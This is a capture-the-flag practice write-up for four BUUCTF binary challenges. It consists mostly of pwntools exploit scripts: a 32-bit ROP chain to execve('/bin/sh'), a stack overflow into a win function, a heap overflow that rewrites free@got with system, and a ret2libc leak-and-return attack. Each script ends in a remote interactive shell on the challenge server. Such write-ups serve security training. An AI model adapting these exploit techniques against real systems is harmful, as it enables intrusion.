PWN-PRACTICE-BUUCTF-12
- cmcc_simplerop
- picoctf_2018_buffer overflow 2
- babyfengshui_33c3_2016
- xdctf2015_pwn200
cmcc_simplerop
静态编译的32位elf,找一个"int 80h"执行系统调用
前提是利用栈溢出读入字符串"/bin/sh\x00",然后找pop给寄存器赋值,最后"int 80h",有execve("/bin/sh",0,0)
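from pwn import *

# cmcc_simplerop: two-stage ROP chain in a statically linked 32-bit ELF.
# Stage 1 returns into read() to place "/bin/sh\0" at a writable address,
# stage 2 loads eax/ebx/ecx/edx and returns into an "int 0x80" gadget
# (execve per the prose above).
io = remote('node4.buuoj.cn', 27587)
# io = process('./cmcc_simplerop')

# Gadget and symbol addresses for this specific binary; the names below are
# the author's, how the gadgets were located is not shown on this page.
int_80 = 0x80493e1              # int 0x80 gadget
pop_eax = 0x80bae06             # pop eax ; ret
read_addr = 0x0806CD50          # read() in the static binary
binsh_addr = 0x080EB584         # writable slot that receives "/bin/sh\0"
pop_edx_ecx_ebx = 0x0806e850    # pop edx ; pop ecx ; pop ebx ; ret (per its name)

# The original fused three statements onto one line and concatenated a str
# with p32() bytes, which only works under Python 2. Bytes literals keep
# the chain valid on both Python 2 and Python 3 pwntools.
payload = b'a' * (0x1c + 4)         # presumably 0x1c of buffer + saved ebp -> return address
payload += p32(read_addr)           # return into read(fd, buf, count)
payload += p32(pop_edx_ecx_ebx)     # read's return address: pops the three args below
payload += p32(0)                   # fd = 0 (stdin)
payload += p32(binsh_addr)          # buf
payload += p32(0x8)                 # count = len("/bin/sh\0")
payload += p32(pop_eax)
payload += p32(0xb)                 # eax = 0xb
payload += p32(pop_edx_ecx_ebx)
payload += p32(0)                   # edx = 0
payload += p32(0)                   # ecx = 0
payload += p32(binsh_addr)          # ebx -> "/bin/sh"
payload += p32(int_80)
io.sendline(payload)
# read() consumes exactly 8 bytes; the newline sendline appends stays unread.
io.sendline('/bin/sh\x00')
io.interactive()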
picoctf_2018_buffer overflow 2
32位elf的栈溢出,传入合适的参数即可
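from pwn import *

# picoctf_2018_buffer overflow 2: plain stack overflow into win() with
# the arguments the challenge expects (see the prose above).
# io = process('./PicoCTF_2018_buffer_overflow_2')
io = remote('node4.buuoj.cn', 27944)
elf = ELF('./PicoCTF_2018_buffer_overflow_2')
win = elf.sym['win']

io.recvuntil('string: \n')
# Bytes literal so the str + p32() concatenation also works on Python 3.
payload = b'a' * (0x6c + 4)      # presumably 0x6c of buffer + saved ebp -> return address
payload += p32(win)              # saved return address -> win
payload += p32(0x0804866D)       # win's own return address (meaning not shown on this page)
payload += p32(0xDEADBEEF)       # first argument checked by win (per the prose)
payload += p32(0xDEADC0DE)       # second argument
io.sendline(payload)
io.interactive()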
babyfengshui_33c3_2016
参考:babyfengshui_33c3_2016题解
from pwn import *

# babyfengshui_33c3_2016: heap challenge; the layout details follow the
# writeup referenced above.
HOST, PORT = "node4.buuoj.cn", 26888
# io = process("./babyfengshui_33c3_2016")
io = remote(HOST, PORT)

# Target binary plus the libc build the remote service runs with.
elf = ELF("./babyfengshui_33c3_2016")
libc = ELF("./libc-2.23-16-x32.so")

# GOT slot of free(): read for the libc leak, overwritten later in the script.
free_got = elf.got["free"]
print(hex(free_got))
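def add(size, name, text_len, text):
    """Menu action 0: create a user with a `size`-byte description.

    The original had every statement fused onto the def line (whitespace-
    mangled paste); restored one statement per line.

    Args:
        size: description size sent as a decimal string.
        name: user name.
        text_len: text length sent as a decimal string.
        text: description contents (str or bytes).
    """
    io.sendlineafter("Action: ", "0")
    io.sendlineafter("size of description: ", str(size))
    io.sendlineafter("name: ", name)
    io.sendlineafter("text length: ", str(text_len))
    io.sendlineafter("text: ", text)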
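def delete(index):
    """Menu action 1: free the user at `index`.

    Restored from a whitespace-mangled one-liner.
    """
    io.sendlineafter("Action: ", "1")
    io.sendlineafter("index: ", str(index))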
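def show(index):
    """Menu action 2: print the user at `index` (the caller reads the output).

    Restored from a whitespace-mangled one-liner.
    """
    io.sendlineafter("Action: ", "2")
    io.sendlineafter("index: ", str(index))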
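def change(index, text_len, text):
    """Menu action 3: rewrite the description of the user at `index`.

    Restored from a whitespace-mangled one-liner.

    Args:
        index: user index.
        text_len: new text length sent as a decimal string.
        text: new description contents (str or bytes).
    """
    io.sendlineafter("Action: ", "3")
    io.sendlineafter("index: ", str(index))
    io.sendlineafter("text length: ", str(text_len))
    io.sendlineafter("text: ", text)
# gdb.attach(io)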
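# The original paste fused each statement onto the preceding "#pause()"
# comment, which turned the add()/delete()/payload lines into dead comment
# text; restored one statement per line.
# pause()
# Three small users; user 2's text is the "/bin/sh" string the final free()
# receives.
add(0x10, "aaaa", 0x10, "bbbb")           # chunk0
add(0x10, "cccc", 0x10, "dddd")           # chunk1
add(0x10, "eeee", 0x10, "/bin/sh\x00")    # chunk2
# pause()
delete(0)
# add(0x80,"gggg",0x20,"hhhh")
# pause()
# Per the referenced writeup this description overflows into user 1's
# record so that its text pointer ends up as free@got (the last dword);
# 0x19 / 0x89 are chunk-header values for that layout. Bytes literals keep
# the str + p32() concatenation valid on Python 3.
payload = b"a" * (0x80 + 4) + p32(0x19) + b"d" * 0x10 + p32(0) + p32(0x89) + p32(free_got)
add(0x80, "gggg", len(payload), payload)
# pause()
show(1)
io.recvuntil("description: ")
free_addr = u32(io.recvn(4))      # recvn: exactly 4 bytes; recv(4) may return fewer
print(hex(free_addr))
libc_base = free_addr - libc.sym["free"]
system = libc_base + libc.sym["system"]
# pause()
# Write system() into the slot user 1 now points at; delete(2) then frees
# the "/bin/sh" text.
payload = p32(system)
change(1, len(payload), payload)
# pause()
delete(2)
io.interactive()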
xdctf2015_pwn200
栈溢出,ret2libc
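from pwn import *

# xdctf2015_pwn200: classic ret2libc in two rounds -- leak write@got, then
# return into system("/bin/sh").
# io = process('./xdctf2015_pwn200')
io = remote('node4.buuoj.cn', 25803)
elf = ELF('./xdctf2015_pwn200')
libc = ELF('./libc-2.23-x32.so')     # libc build matching the remote target
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']

# Round 1: write(1, write_got, 4) prints the resolved address of write(),
# then return to main for a second overflow. Bytes literals keep the
# str + p32() concatenation valid on Python 3 as well as Python 2.
io.recvuntil('XDCTF2015~!\n')
payload = b'a' * (0x6c + 4)     # presumably 0x6c of buffer + saved ebp -> return address
payload += p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(write_got) + p32(4)
io.sendline(payload)
write_addr = u32(io.recvn(4))   # recvn: exactly 4 bytes; recv(4) may return fewer
print(hex(write_addr))

# Resolve system() and a "/bin/sh" string against the matching libc.
libc_base = write_addr - libc.sym['write']
system = libc_base + libc.sym['system']
# next() builtin instead of the Python-2-only .next() method; bytes needle
# because ELF.search matches against raw segment bytes.
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Round 2: system("/bin/sh") with main as its return address.
io.recvuntil('XDCTF2015~!\n')
payload = b'a' * (0x6c + 4) + p32(system) + p32(main_addr) + p32(binsh)
io.sendline(payload)
io.interactive()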